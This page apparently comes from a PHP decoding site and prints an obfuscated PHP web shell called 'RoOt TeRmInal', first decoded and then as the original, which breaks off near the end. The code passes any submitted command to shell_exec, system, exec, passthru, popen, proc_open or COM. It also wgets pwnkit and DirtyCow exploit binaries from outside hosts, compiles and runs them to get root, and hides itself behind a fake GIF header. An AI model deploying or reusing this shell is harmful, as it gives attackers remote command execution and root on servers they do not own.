Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ${"GLOBALS"}["izrleth"]="url";${"GLOBALS"}["grbhpgbt"]="value";${"GLOBALS"}["juhkqgj..

Decoded Output download

<?php ${"GLOBALS"}["izrleth"]="url";${"GLOBALS"}["grbhpgbt"]="value";${"GLOBALS"}["juhkqgjz"]="pl";${"GLOBALS"}["ztiirvwo"]="xplod";${"GLOBALS"}["wcxklldup"]="n";${"GLOBALS"}["criiwh"]="y";${"GLOBALS"}["jfkjyblycp"]="xpld";${"GLOBALS"}["sfzcrf"]="uname";${"GLOBALS"}["yxivjpgoqpdj"]="explode_mad_pwkit";${"GLOBALS"}["onxmxwwuwjjx"]="check_vulnerable";${"GLOBALS"}["afngirbwh"]="pipes";${"GLOBALS"}["psyoihjwqs"]="f";${"GLOBALS"}["eqqtugufkkt"]="exec";${"GLOBALS"}["bijlsctb"]="de";${"GLOBALS"}["wfszxwgdaws"]="out";${"GLOBALS"}["jhufwyxabkav"]="xpls";${"GLOBALS"}["hyhygtkkvo"]="terminal";${"GLOBALS"}["panijkqy"]="hitung_array";${"GLOBALS"}["fwjnxhukg"]="i";${"GLOBALS"}["ylanqz"]="Array";echo "GIF89;a 
";$ywevhjt="i";${"GLOBALS"}["fiideal"]="fungsi";$qqhckvtv="Array";@set_time_limit(0);@clearstatcache();@ini_set("error_log",NULL);$ohcufyepip="fungsi";@ini_set("log_errors",0);@ini_set("max_execution_time",0);@ini_set("output_buffering",0);@ini_set("display_errors",0);${$qqhckvtv}=["7368656c6c5f65786563","65786563","7061737374687275","73797374656d","70726f635f6f70656e","706f70656e","70636c6f7365","72657475726e","73747265616d5f6765745f636f6e74656e7473","676574637764","6368646972","7068705f756e616d65","6973736574","66756e6374696f6e5f657869737473","5f6d61645f636d64","245f5345525645525b275345525645525f4e414d45275d","68747470733a2f2f6769746875622e636f6d2f4d61644578706c6f6974732f50726976656c6567652d657363616c6174696f6e2f7261772f6d61696e2f70776e6b6974","66696c655f6765745f636f6e74656e7473","5345525645525f4e414d45","6368646972","676574637764","68747470733a2f2f7777772e6578706c6f69742d64622e636f6d2f646f776e6c6f61642f3430383339",];${"GLOBALS"}["bwltxuu"]="hitung_array";${${"GLOBALS"}["bwltxuu"]}=count(${${"GLOBALS"}["ylanqz"]});${"GLOBALS"}["fwdzpbf"]="i";for(${${"GLOBALS"}["fwjnxhukg"]}=0;${$ywevhjt}<${${"GLOBALS"}["panijkqy"]};${${"GLOBALS"}["fwdzpbf"]}++){${"GLOBALS"}["aepkhf"]="fungsi";${${"GLOBALS"}["aepkhf"]}[]=unhex(${${"GLOBALS"}["ylanqz"]}[${${"GLOBALS"}["fwjnxhukg"]}]);}if($_GET["terminal"]=="root"||$_GET["terminal"]=="normal"){${${"GLOBALS"}["hyhygtkkvo"]}=$_POST["terminal"];$uywixikcbolj="xpls";${"GLOBALS"}["kybgrrzgo"]="terminal";${$uywixikcbolj}=explode(" ",${${"GLOBALS"}["kybgrrzgo"]});if(${${"GLOBALS"}["hyhygtkkvo"]}=="cd ".${${"GLOBALS"}["jhufwyxabkav"]}[1]){echo redir(${${"GLOBALS"}["jhufwyxabkav"]}[1],$_GET["terminal"]);}}if(isset($_GET["path"])){$uircuixnd="cdir";$xpdpvlt="cdir";$rjsgeidbtm="fungsi";${$uircuixnd}=unhex($_GET["path"]);${$rjsgeidbtm}[19](${$xpdpvlt});}else{$vgesieyvp="cdir";${"GLOBALS"}["lnuxmbugil"]="fungsi";${$vgesieyvp}=${${"GLOBALS"}["lnuxmbugil"]}[20]();}echo "<!doctype html> 
<html lang=\"en\"> 
 
<head> 
    <meta charset="utf-8"> 
    <meta name="viewport\" content="width=device-width, initial-scale=1"> 
    <title>RoOt TeRmInal [";echo $_SERVER["SERVER_NAME"];echo "]</title> 
    <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css\" rel="stylesheet\" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous\"> 
    <style> 
        @import url(\"https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"); 
 
        * { 
            font-family: monospace; 
        } 
 
        body { 
            background-color: whitesmoke; 
        } 
 
        ul { 
            list-style: none; 
        } 
 
        li { 
            padding: 5px 0px; 
        } 
 
        .terminal-r00t-body { 
            width: 100%; 
            height: 60vh; 
            color: #3acf73; 
            background-color: #292929; 
        } 
 
        .terminal-r00t-link { 
            padding: 12px; 
            text-decoration: none; 
            background-color: #292929; 
            color: #3acf73; 
            border-radius: 7px; 
        } 
 
        .terminal-r00t-link:hover { 
            color: white; 
        } 
 
        .terminal-header { 
            margin-left: -25px; 
            position: relative; 
            z-index: 2; 
        } 
 
        .terminal-header li { 
            display: inline; 
        } 
 
        .terminal-r00t-body input[type="text\"] { 
            width: 90%; 
            border: 1px solid whitesmoke; 
            background-color: #292929; 
            border-radius: 3px; 
            padding: 2px; 
            color: #3acf73; 
        } 
 
        .terminal-r00t-body input[type=\"submit\"] { 
            border: 1px solid whitesmoke; 
            padding: 2px 8.5px; 
            border-radius: 2px; 
            color: #3acf73; 
            background-color: #292929; 
        } 
 
        form { 
            text-align: center; 
            padding: 5px; 
        } 
 
        textarea { 
            background-color: #292929; 
            color: #3acf73; 
            width: 99.9%; 
            height: 50vh; 
        } 
    </style> 
</head> 
 
<body> 
    <br> 
    <center> 
        <h3><b>RoOt TeRmInal</b></h3> 
    </center> 
    <div class="container"> 
        <ul> 
            <li><b>";echo ${$ohcufyepip}[11]();echo "</b></li> 
            <li><b>BASH[";echo check_function("bash");echo "];PERL[";echo check_function("perl");echo "];PKEXEC[";echo check_function("pkexec");echo "];GCC[";echo check_function("gcc");echo "]</b></li> 
            <li><b>";echo get_current_user();echo "</b></li> 
        </ul> 
    </div> 
    <div class=\"container"> 
        <ul class="terminal-header\"> 
            <li><a href=\"?terminal=normal\" class=\"terminal-r00t-link shadow"><i class=\"bi bi-terminal-plus"></i>&nbsp;Terminal</a></li> 
            <li><a href="?terminal=root\" class=\"terminal-r00t-link shadow"><i class="bi bi-terminal-dash"></i>&nbsp;R00t Terminal</a></li> 
        </ul> 
        <div class="terminal-r00t-body rounded shadow-lg\"> 
            <form action=\"" method="post\"> 
                <input type="text" name=\"terminal" id=\"\" placeholder="terminal@";echo $_SERVER[${${"GLOBALS"}["fiideal"]}[18]];echo "~#\" autofocus> 
                <input type=\"submit" name=\"submit\" value=">"> 
            </form> 
            <br> 
            ";${${"GLOBALS"}["hyhygtkkvo"]}=$_POST["terminal"];if($_GET["terminal"]=="normal"){echo"<textarea class=\"border-0" disabled>";if(isset($_POST["submit"])){echo HtmLsPecialChars(_mad_cmd(${${"GLOBALS"}["hyhygtkkvo"]}." 2>&1"));}echo"</textarea>";}else if($_GET["terminal"]=="root"){echo"<textarea class=\"border-0\" disabled>";if(${${"GLOBALS"}["hyhygtkkvo"]}=="root"){root_terminal();}echo HtmLsPecialChars(_mad_cmd("./pwnkit \"".${${"GLOBALS"}["hyhygtkkvo"]}."\""));echo"</textarea> 
";}else{echo base64_decode("WyBQcml2ZWxlZ2UgRXNjYWxhdGlvbiBFeHBsb2l0ZXIgXTxicj4KWytdIEF1dGhvciA6IC4vTXJNYWQ8YnI+ClsrXSBodHRwczovL2dpdGh1Yi5jb20vTWFkRXhwbG9pdHM8YnI+Cjxicj4KWytdIFR5cGUgcm9vdCBmb3IgcnVubmluZyBhdXRvIHJvb3Q=");}echo "        </div> 
    </div> 
    <br> 
    <center> 
        <span><b>&copy;Copyright By ./MrMad</b></span> 
    </center> 
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-u1OknCvxWvY5kfmNBILK2hRnQC3Pr17a+RTT6rIHI7NnikvbZlHgTPOOmMi466C8" crossorigin=\"anonymous\"></script> 
</body> 
 
</html> 
 
";function _mad_cmd($de){${${"GLOBALS"}["wfszxwgdaws"]}="";try{if(fUncTion_eXistS("shell_exec")){$xiyuzhnihzv="de";return@$GLOBALS["fungsi"][0](${$xiyuzhnihzv});}else if(fUncTion_eXistS("system")){@$GLOBALS["fungsi"][3](${${"GLOBALS"}["bijlsctb"]});}else if(fUncTion_eXistS("exec")){${"GLOBALS"}["ssqclfo"]="exec";${"GLOBALS"}["ugpyefoki"]="de";${${"GLOBALS"}["eqqtugufkkt"]}=array();@$GLOBALS["fungsi"][1](${${"GLOBALS"}["ugpyefoki"]},${${"GLOBALS"}["ssqclfo"]});${"GLOBALS"}["iiiaittohid"]="exec";${${"GLOBALS"}["wfszxwgdaws"]}=@join(" 
",${${"GLOBALS"}["eqqtugufkkt"]});return${${"GLOBALS"}["iiiaittohid"]};}else if(fUncTion_eXistS("passthru")){@$GLOBALS["fungsi"][2](${${"GLOBALS"}["bijlsctb"]});}else if(fUncTion_eXistS("popen")&&fUncTion_eXistS("pclose")){${"GLOBALS"}["nsyptd"]="f";${"GLOBALS"}["pprktiss"]="de";if(is_resource(${${"GLOBALS"}["nsyptd"]}=@$GLOBALS["fungsi"][5](${${"GLOBALS"}["pprktiss"]},"r"))){${${"GLOBALS"}["wfszxwgdaws"]}="";while(!@feof(${${"GLOBALS"}["psyoihjwqs"]}))${${"GLOBALS"}["wfszxwgdaws"]}.=FrEad(${${"GLOBALS"}["psyoihjwqs"]},1024);return${${"GLOBALS"}["wfszxwgdaws"]};${"GLOBALS"}["jrcgyathib"]="f";$GLOBALS["fungsi"][6](${${"GLOBALS"}["jrcgyathib"]});}}else if(fUncTion_eXistS("proc_open")){${"GLOBALS"}["kfucegnxdcq"]="out";${"GLOBALS"}["hpjqpumlcww"]="process";${${"GLOBALS"}["afngirbwh"]}=array();${${"GLOBALS"}["hpjqpumlcww"]}=@$GLOBALS["fungsi"][4](${${"GLOBALS"}["bijlsctb"]}." 2>&1",array(array("pipe","w"),array("pipe","w"),array("pipe","w")),${${"GLOBALS"}["afngirbwh"]},null);${${"GLOBALS"}["kfucegnxdcq"]}=@$GLOBALS["fungsi"][8](${${"GLOBALS"}["afngirbwh"]}[1]);return${${"GLOBALS"}["wfszxwgdaws"]};}else if(class_exists("COM")){${"GLOBALS"}["iomeyebab"]="stdout";${"GLOBALS"}["xnegfvkacvh"]="madWs";${${"GLOBALS"}["xnegfvkacvh"]}=new COM("WScript.shell");${${"GLOBALS"}["eqqtugufkkt"]}=$madWs->$GLOBALS["fungsi"][1]("cmd.exe /c ".$_POST["alfa1"]);${${"GLOBALS"}["iomeyebab"]}=$exec->StdOut();${${"GLOBALS"}["wfszxwgdaws"]}=$stdout->ReadAll();}}catch(Exception$e){}return$out;}function root_terminal(){echo" 
[+] Downloading The source  
";echo _mad_cmd("wget ".$GLOBALS["fungsi"][16]." --no-check-certificate");echo"[!] Chmod file pwnkit.... 
";echo _mad_cmd("chmod +x pwnkit");echo"[+] Testing if this kernel vulnerable... 
";${"GLOBALS"}["doydpsq"]="check_vulnerable";echo"[!] This kernel version is ".kernel_angka()."  
";if(suggest_exploit()=="5.11"){echo"[!] This Kernel Maybe Vuln Dirtypipe 
";}else if(suggest_exploit()=="4.10"){echo"[!] This Kernel Maybe Vuln PTRACE_TRACEME 
";}else if(suggest_exploit()=="2.6.22"||suggest_exploit()=="3.9.".True.""){echo _mad_cmd("wget ".$GLOBALS["fungsi"][21]." -O dirty.c --no-check-certificate");echo _mad_cmd("gcc -pthread dirty.c -o dirty -lcrypt");echo _mad_cmd("chmod +x dirty");echo"Creating Password using 'MrMad' 
";echo _mad_cmd("./dirty mrmad");echo"Done rooting please check firts using cat /etc/passwd 
";echo"You Can running that user using sh firefart@".$_SERVER["SERVER_ADDR"]." 
";echo"DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! 
";echo"mv /tmp/passwd.bak /etc/passwd";echo"Exploit adopted by Christian \"FireFart" Mehlmauer";exit;}else if(distro_linux()=="Debian"||distro_linux()=="Ubuntu"||distro_linux()=="Centos"){echo"[!] This Kernel Maybe Vuln Pwnkit 
";}else if(suggest_exploit()=="5.16.11"||suggest_exploit()=="5.15.25"||suggest_exploit()=="5.10.102"){echo"This Kernel Maybe Vuln Dirtypipe  
";echo"Dirty Pipe - CVE-2022-0847 
";echo"Backconnect source: https://github.com/MadExploits/Reverse-Shell-Payload 
";echo"Exploit Source: https://github.com/0xIronGoat/dirty-pipe 
";}else if(suggest_exploit()=="4.19.2"||suggest_exploit()=="4.15.".True.""){echo"This Kernel Maybe Vuln Subuid 
";echo"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method) 
";echo"Backconnect source: https://github.com/MadExploits/Reverse-Shell-Payload 
";echo"Exploit Source: https://www.exploit-db.com/download/47165 
";}echo _mad_cmd("./pwnkit "id\" > mad-pwnkit");${${"GLOBALS"}["onxmxwwuwjjx"]}=$GLOBALS["fungsi"][17](__DIR__."/mad-pwnkit");${${"GLOBALS"}["yxivjpgoqpdj"]}=explode(" ",${${"GLOBALS"}["doydpsq"]});if(${${"GLOBALS"}["yxivjpgoqpdj"]}[0]=="uid=0(root)"){echo"[~] This Kernel is vulnerable congrats! 
";}else{echo"[!] This kernel is not Vulnerable Sorry :)";return;}echo"[+] Giving Permission on mad-pwnkit 
";echo _mad_cmd("chmod +x mad-pwnkit");if(!_mad_cmd("./pwnkit \"id"")){echo"[!] Cannot running pwnkit";}else{echo"[!] Done Sir. now u can running on root user!";exit;}}function check_function($value){if(_mad_cmd("$value --version")){return"<font color='green'>ON</font>";}else{return"<font color='red'>OFF</font>";}}function kernel_angka(){${"GLOBALS"}["gieflnmwb"]="xplod";$ngmulaqoiiv="xplod";${${"GLOBALS"}["sfzcrf"]}=$GLOBALS["fungsi"][11]();${$ngmulaqoiiv}=explode(" ",${${"GLOBALS"}["sfzcrf"]});${${"GLOBALS"}["jfkjyblycp"]}=explode("-",${${"GLOBALS"}["gieflnmwb"]}[2]);return${${"GLOBALS"}["jfkjyblycp"]}[0];}function hex($n){$uvsuxeyqko="i";$hlnogyjbysux="y";$dbvwxc="n";${$hlnogyjbysux}="";for(${${"GLOBALS"}["fwjnxhukg"]}=0;${${"GLOBALS"}["fwjnxhukg"]}<strlen(${$dbvwxc});${$uvsuxeyqko}++){$iqnjbrrpq="n";$yjzcxqpvd="i";$htseejsobk="y";${$htseejsobk}.=dechex(ord(${$iqnjbrrpq}[${$yjzcxqpvd}]));}return${${"GLOBALS"}["criiwh"]};}function unhex($y){${"GLOBALS"}["tpeewjhjrkd"]="i";${${"GLOBALS"}["wcxklldup"]}="";${"GLOBALS"}["qyvxdlvofhux"]="i";for(${${"GLOBALS"}["qyvxdlvofhux"]}=0;${${"GLOBALS"}["tpeewjhjrkd"]}<strlen(${${"GLOBALS"}["criiwh"]})-1;${${"GLOBALS"}["fwjnxhukg"]}+=2){$gackbqri="y";${"GLOBALS"}["cadsks"]="n";${"GLOBALS"}["yhlmmqbodky"]="y";${${"GLOBALS"}["cadsks"]}.=chr(hexdec(${$gackbqri}[${${"GLOBALS"}["fwjnxhukg"]}].${${"GLOBALS"}["yhlmmqbodky"]}[${${"GLOBALS"}["fwjnxhukg"]}+1]));}return${${"GLOBALS"}["wcxklldup"]};}function suggest_exploit(){$sujzmiispj="xpld";$qpxlofopl="uname";$qzpykjkpfr="xplod";${${"GLOBALS"}["sfzcrf"]}=$GLOBALS["fungsi"][11]();${${"GLOBALS"}["ztiirvwo"]}=explode(" ",${$qpxlofopl});$suoieyewaffg="pl";$hixlvfg="xpld";$ypxqbcucvigz="pl";${$sujzmiispj}=explode("-",${$qzpykjkpfr}[2]);${$ypxqbcucvigz}=explode(".",${$hixlvfg}[0]);return${$suoieyewaffg}[0].".".${${"GLOBALS"}["juhkqgjz"]}[1];}function distro_linux(){${"GLOBALS"}["hynurlhue"]="xplod";${${"GLOBALS"}["sfzcrf"]}=$GLOBALS["fungsi"][11]();$pfwfyyxcpv="uname";${${"GLOBALS"}["hynurlhue"]}=explode(" ",${$pfwfyyxcpv});return${${"GLOBALS"}["ztiirvwo"]}[6];}function redir($url,$value){return"<meta http-equiv="refresh\" content=\"0;url=?terminal=".${${"GLOBALS"}["grbhpgbt"]}."&path=".hex(${${"GLOBALS"}["izrleth"]})."\">";}  
?>

Did this file decode correctly?

Original Code

<?php ${"GLOBALS"}["izrleth"]="url";${"GLOBALS"}["grbhpgbt"]="value";${"GLOBALS"}["juhkqgjz"]="pl";${"GLOBALS"}["ztiirvwo"]="xplod";${"GLOBALS"}["wcxklldup"]="n";${"GLOBALS"}["criiwh"]="y";${"GLOBALS"}["jfkjyblycp"]="xpld";${"GLOBALS"}["sfzcrf"]="uname";${"GLOBALS"}["yxivjpgoqpdj"]="explode_mad_pwkit";${"GLOBALS"}["onxmxwwuwjjx"]="check_vulnerable";${"GLOBALS"}["afngirbwh"]="pipes";${"GLOBALS"}["psyoihjwqs"]="f";${"GLOBALS"}["eqqtugufkkt"]="exec";${"GLOBALS"}["bijlsctb"]="de";${"GLOBALS"}["wfszxwgdaws"]="out";${"GLOBALS"}["jhufwyxabkav"]="xpls";${"GLOBALS"}["hyhygtkkvo"]="terminal";${"GLOBALS"}["panijkqy"]="hitung_array";${"GLOBALS"}["fwjnxhukg"]="i";${"GLOBALS"}["ylanqz"]="Array";echo "GIF89;a
";$ywevhjt="i";${"GLOBALS"}["fiideal"]="fungsi";$qqhckvtv="Array";@set_time_limit(0);@clearstatcache();@ini_set("error_log",NULL);$ohcufyepip="fungsi";@ini_set("log_errors",0);@ini_set("max_execution_time",0);@ini_set("output_buffering",0);@ini_set("display_errors",0);${$qqhckvtv}=["7368656c6c5f65786563","65786563","7061737374687275","73797374656d","70726f635f6f70656e","706f70656e","70636c6f7365","72657475726e","73747265616d5f6765745f636f6e74656e7473","676574637764","6368646972","7068705f756e616d65","6973736574","66756e6374696f6e5f657869737473","5f6d61645f636d64","245f5345525645525b275345525645525f4e414d45275d","68747470733a2f2f6769746875622e636f6d2f4d61644578706c6f6974732f50726976656c6567652d657363616c6174696f6e2f7261772f6d61696e2f70776e6b6974","66696c655f6765745f636f6e74656e7473","5345525645525f4e414d45","6368646972","676574637764","68747470733a2f2f7777772e6578706c6f69742d64622e636f6d2f646f776e6c6f61642f3430383339",];${"GLOBALS"}["bwltxuu"]="hitung_array";${${"GLOBALS"}["bwltxuu"]}=count(${${"GLOBALS"}["ylanqz"]});${"GLOBALS"}["fwdzpbf"]="i";for(${${"GLOBALS"}["fwjnxhukg"]}=0;${$ywevhjt}<${${"GLOBALS"}["panijkqy"]};${${"GLOBALS"}["fwdzpbf"]}++){${"GLOBALS"}["aepkhf"]="fungsi";${${"GLOBALS"}["aepkhf"]}[]=unhex(${${"GLOBALS"}["ylanqz"]}[${${"GLOBALS"}["fwjnxhukg"]}]);}if($_GET["terminal"]=="root"||$_GET["terminal"]=="normal"){${${"GLOBALS"}["hyhygtkkvo"]}=$_POST["terminal"];$uywixikcbolj="xpls";${"GLOBALS"}["kybgrrzgo"]="terminal";${$uywixikcbolj}=explode(" ",${${"GLOBALS"}["kybgrrzgo"]});if(${${"GLOBALS"}["hyhygtkkvo"]}=="cd ".${${"GLOBALS"}["jhufwyxabkav"]}[1]){echo redir(${${"GLOBALS"}["jhufwyxabkav"]}[1],$_GET["terminal"]);}}if(isset($_GET["path"])){$uircuixnd="cdir";$xpdpvlt="cdir";$rjsgeidbtm="fungsi";${$uircuixnd}=unhex($_GET["path"]);${$rjsgeidbtm}[19](${$xpdpvlt});}else{$vgesieyvp="cdir";${"GLOBALS"}["lnuxmbugil"]="fungsi";${$vgesieyvp}=${${"GLOBALS"}["lnuxmbugil"]}[20]();}echo "<!doctype html>
<html lang=\"en\">

<head>
    <meta charset="utf-8">
    <meta name="viewport\" content="width=device-width, initial-scale=1">
    <title>RoOt TeRmInal [";echo $_SERVER["SERVER_NAME"];echo "]</title>
    <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css\" rel="stylesheet\" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous\">
    <style>
        @import url(\"https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css");

        * {
            font-family: monospace;
        }

        body {
            background-color: whitesmoke;
        }

        ul {
            list-style: none;
        }

        li {
            padding: 5px 0px;
        }

        .terminal-r00t-body {
            width: 100%;
            height: 60vh;
            color: #3acf73;
            background-color: #292929;
        }

        .terminal-r00t-link {
            padding: 12px;
            text-decoration: none;
            background-color: #292929;
            color: #3acf73;
            border-radius: 7px;
        }

        .terminal-r00t-link:hover {
            color: white;
        }

        .terminal-header {
            margin-left: -25px;
            position: relative;
            z-index: 2;
        }

        .terminal-header li {
            display: inline;
        }

        .terminal-r00t-body input[type="text\"] {
            width: 90%;
            border: 1px solid whitesmoke;
            background-color: #292929;
            border-radius: 3px;
            padding: 2px;
            color: #3acf73;
        }

        .terminal-r00t-body input[type=\"submit\"] {
            border: 1px solid whitesmoke;
            padding: 2px 8.5px;
            border-radius: 2px;
            color: #3acf73;
            background-color: #292929;
        }

        form {
            text-align: center;
            padding: 5px;
        }

        textarea {
            background-color: #292929;
            color: #3acf73;
            width: 99.9%;
            height: 50vh;
        }
    </style>
</head>

<body>
    <br>
    <center>
        <h3><b>RoOt TeRmInal</b></h3>
    </center>
    <div class="container">
        <ul>
            <li><b>";echo ${$ohcufyepip}[11]();echo "</b></li>
            <li><b>BASH[";echo check_function("bash");echo "];PERL[";echo check_function("perl");echo "];PKEXEC[";echo check_function("pkexec");echo "];GCC[";echo check_function("gcc");echo "]</b></li>
            <li><b>";echo get_current_user();echo "</b></li>
        </ul>
    </div>
    <div class=\"container">
        <ul class="terminal-header\">
            <li><a href=\"?terminal=normal\" class=\"terminal-r00t-link shadow"><i class=\"bi bi-terminal-plus"></i>&nbsp;Terminal</a></li>
            <li><a href="?terminal=root\" class=\"terminal-r00t-link shadow"><i class="bi bi-terminal-dash"></i>&nbsp;R00t Terminal</a></li>
        </ul>
        <div class="terminal-r00t-body rounded shadow-lg\">
            <form action=\"" method="post\">
                <input type="text" name=\"terminal" id=\"\" placeholder="terminal@";echo $_SERVER[${${"GLOBALS"}["fiideal"]}[18]];echo "~#\" autofocus>
                <input type=\"submit" name=\"submit\" value=">">
            </form>
            <br>
            ";${${"GLOBALS"}["hyhygtkkvo"]}=$_POST["terminal"];if($_GET["terminal"]=="normal"){echo"<textarea class=\"border-0" disabled>";if(isset($_POST["submit"])){echo HtmLsPecialChars(_mad_cmd(${${"GLOBALS"}["hyhygtkkvo"]}." 2>&1"));}echo"</textarea>";}else if($_GET["terminal"]=="root"){echo"<textarea class=\"border-0\" disabled>";if(${${"GLOBALS"}["hyhygtkkvo"]}=="root"){root_terminal();}echo HtmLsPecialChars(_mad_cmd("./pwnkit \"".${${"GLOBALS"}["hyhygtkkvo"]}."\""));echo"</textarea>
";}else{echo base64_decode("WyBQcml2ZWxlZ2UgRXNjYWxhdGlvbiBFeHBsb2l0ZXIgXTxicj4KWytdIEF1dGhvciA6IC4vTXJNYWQ8YnI+ClsrXSBodHRwczovL2dpdGh1Yi5jb20vTWFkRXhwbG9pdHM8YnI+Cjxicj4KWytdIFR5cGUgcm9vdCBmb3IgcnVubmluZyBhdXRvIHJvb3Q=");}echo "        </div>
    </div>
    <br>
    <center>
        <span><b>&copy;Copyright By ./MrMad</b></span>
    </center>
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-u1OknCvxWvY5kfmNBILK2hRnQC3Pr17a+RTT6rIHI7NnikvbZlHgTPOOmMi466C8" crossorigin=\"anonymous\"></script>
</body>

</html>

";function _mad_cmd($de){${${"GLOBALS"}["wfszxwgdaws"]}="";try{if(fUncTion_eXistS("shell_exec")){$xiyuzhnihzv="de";return@$GLOBALS["fungsi"][0](${$xiyuzhnihzv});}else if(fUncTion_eXistS("system")){@$GLOBALS["fungsi"][3](${${"GLOBALS"}["bijlsctb"]});}else if(fUncTion_eXistS("exec")){${"GLOBALS"}["ssqclfo"]="exec";${"GLOBALS"}["ugpyefoki"]="de";${${"GLOBALS"}["eqqtugufkkt"]}=array();@$GLOBALS["fungsi"][1](${${"GLOBALS"}["ugpyefoki"]},${${"GLOBALS"}["ssqclfo"]});${"GLOBALS"}["iiiaittohid"]="exec";${${"GLOBALS"}["wfszxwgdaws"]}=@join("
",${${"GLOBALS"}["eqqtugufkkt"]});return${${"GLOBALS"}["iiiaittohid"]};}else if(fUncTion_eXistS("passthru")){@$GLOBALS["fungsi"][2](${${"GLOBALS"}["bijlsctb"]});}else if(fUncTion_eXistS("popen")&&fUncTion_eXistS("pclose")){${"GLOBALS"}["nsyptd"]="f";${"GLOBALS"}["pprktiss"]="de";if(is_resource(${${"GLOBALS"}["nsyptd"]}=@$GLOBALS["fungsi"][5](${${"GLOBALS"}["pprktiss"]},"r"))){${${"GLOBALS"}["wfszxwgdaws"]}="";while(!@feof(${${"GLOBALS"}["psyoihjwqs"]}))${${"GLOBALS"}["wfszxwgdaws"]}.=FrEad(${${"GLOBALS"}["psyoihjwqs"]},1024);return${${"GLOBALS"}["wfszxwgdaws"]};${"GLOBALS"}["jrcgyathib"]="f";$GLOBALS["fungsi"][6](${${"GLOBALS"}["jrcgyathib"]});}}else if(fUncTion_eXistS("proc_open")){${"GLOBALS"}["kfucegnxdcq"]="out";${"GLOBALS"}["hpjqpumlcww"]="process";${${"GLOBALS"}["afngirbwh"]}=array();${${"GLOBALS"}["hpjqpumlcww"]}=@$GLOBALS["fungsi"][4](${${"GLOBALS"}["bijlsctb"]}." 2>&1",array(array("pipe","w"),array("pipe","w"),array("pipe","w")),${${"GLOBALS"}["afngirbwh"]},null);${${"GLOBALS"}["kfucegnxdcq"]}=@$GLOBALS["fungsi"][8](${${"GLOBALS"}["afngirbwh"]}[1]);return${${"GLOBALS"}["wfszxwgdaws"]};}else if(class_exists("COM")){${"GLOBALS"}["iomeyebab"]="stdout";${"GLOBALS"}["xnegfvkacvh"]="madWs";${${"GLOBALS"}["xnegfvkacvh"]}=new COM("WScript.shell");${${"GLOBALS"}["eqqtugufkkt"]}=$madWs->$GLOBALS["fungsi"][1]("cmd.exe /c ".$_POST["alfa1"]);${${"GLOBALS"}["iomeyebab"]}=$exec->StdOut();${${"GLOBALS"}["wfszxwgdaws"]}=$stdout->ReadAll();}}catch(Exception$e){}return$out;}function root_terminal(){echo"
[+] Downloading The source 
";echo _mad_cmd("wget ".$GLOBALS["fungsi"][16]." --no-check-certificate");echo"[!] Chmod file pwnkit....
";echo _mad_cmd("chmod +x pwnkit");echo"[+] Testing if this kernel vulnerable...
";${"GLOBALS"}["doydpsq"]="check_vulnerable";echo"[!] This kernel version is ".kernel_angka()." 
";if(suggest_exploit()=="5.11"){echo"[!] This Kernel Maybe Vuln Dirtypipe
";}else if(suggest_exploit()=="4.10"){echo"[!] This Kernel Maybe Vuln PTRACE_TRACEME
";}else if(suggest_exploit()=="2.6.22"||suggest_exploit()=="3.9.".True.""){echo _mad_cmd("wget ".$GLOBALS["fungsi"][21]." -O dirty.c --no-check-certificate");echo _mad_cmd("gcc -pthread dirty.c -o dirty -lcrypt");echo _mad_cmd("chmod +x dirty");echo"Creating Password using 'MrMad'
";echo _mad_cmd("./dirty mrmad");echo"Done rooting please check firts using cat /etc/passwd
";echo"You Can running that user using sh firefart@".$_SERVER["SERVER_ADDR"]."
";echo"DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
";echo"mv /tmp/passwd.bak /etc/passwd";echo"Exploit adopted by Christian \"FireFart" Mehlmauer";exit;}else if(distro_linux()=="Debian"||distro_linux()=="Ubuntu"||distro_linux()=="Centos"){echo"[!] This Kernel Maybe Vuln Pwnkit
";}else if(suggest_exploit()=="5.16.11"||suggest_exploit()=="5.15.25"||suggest_exploit()=="5.10.102"){echo"This Kernel Maybe Vuln Dirtypipe 
";echo"Dirty Pipe - CVE-2022-0847
";echo"Backconnect source: https://github.com/MadExploits/Reverse-Shell-Payload
";echo"Exploit Source: https://github.com/0xIronGoat/dirty-pipe
";}else if(suggest_exploit()=="4.19.2"||suggest_exploit()=="4.15.".True.""){echo"This Kernel Maybe Vuln Subuid
";echo"Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)
";echo"Backconnect source: https://github.com/MadExploits/Reverse-Shell-Payload
";echo"Exploit Source: https://www.exploit-db.com/download/47165
";}echo _mad_cmd("./pwnkit "id\" > mad-pwnkit");${${"GLOBALS"}["onxmxwwuwjjx"]}=$GLOBALS["fungsi"][17](__DIR__."/mad-pwnkit");${${"GLOBALS"}["yxivjpgoqpdj"]}=explode(" ",${${"GLOBALS"}["doydpsq"]});if(${${"GLOBALS"}["yxivjpgoqpdj"]}[0]=="uid=0(root)"){echo"[~] This Kernel is vulnerable congrats!
";}else{echo"[!] This kernel is not Vulnerable Sorry :)";return;}echo"[+] Giving Permission on mad-pwnkit
